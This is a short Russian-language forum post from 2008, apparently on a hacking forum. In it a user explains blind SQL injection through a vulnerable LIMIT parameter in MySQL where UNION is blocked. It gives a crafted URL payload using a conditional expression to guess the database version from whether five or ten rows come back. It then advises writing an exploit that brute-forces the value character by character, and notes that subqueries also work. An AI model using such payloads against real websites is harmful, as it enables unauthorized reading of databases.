12.11.2008, 21:52
|
|
Участник форума
Регистрация: 28.07.2008
Сообщений: 158
С нами:
9361826
Репутация:
115
|
|
Сообщение от jokester
Лично мне о такой возможности ничего не известно (если это мускул разумеется), но как видишь уважаемый prescott хоть и косвенно, но дал понять, что это возможно.
Ну что-ж линк я дал, надеюсь увидеть реализацию.
Union использовать действительно нельзя, но:
Код:
select * from <table_name> order by 1 limit 0,5
Допустим 5 в лимите уязвимый параметр, пишем так:
Код:
http://site.ru/id=5*if(version='5.0.1т.д. и т.п.',1,2)
Получаем
Код:
select * from <table_name> order by 1 limit 0, 5*if(version='5.0.1т.д. и т.п.',1,2)
Если вернуло пять записей - угадал версию, если десять - не угадал. Пишешь сплоит который перебирает посимвольно и дело в шляпе.
И подзапросы в mysql тоже никто не отменял кстати.
Последний раз редактировалось prescott; 12.11.2008 в 21:55..
|
|
|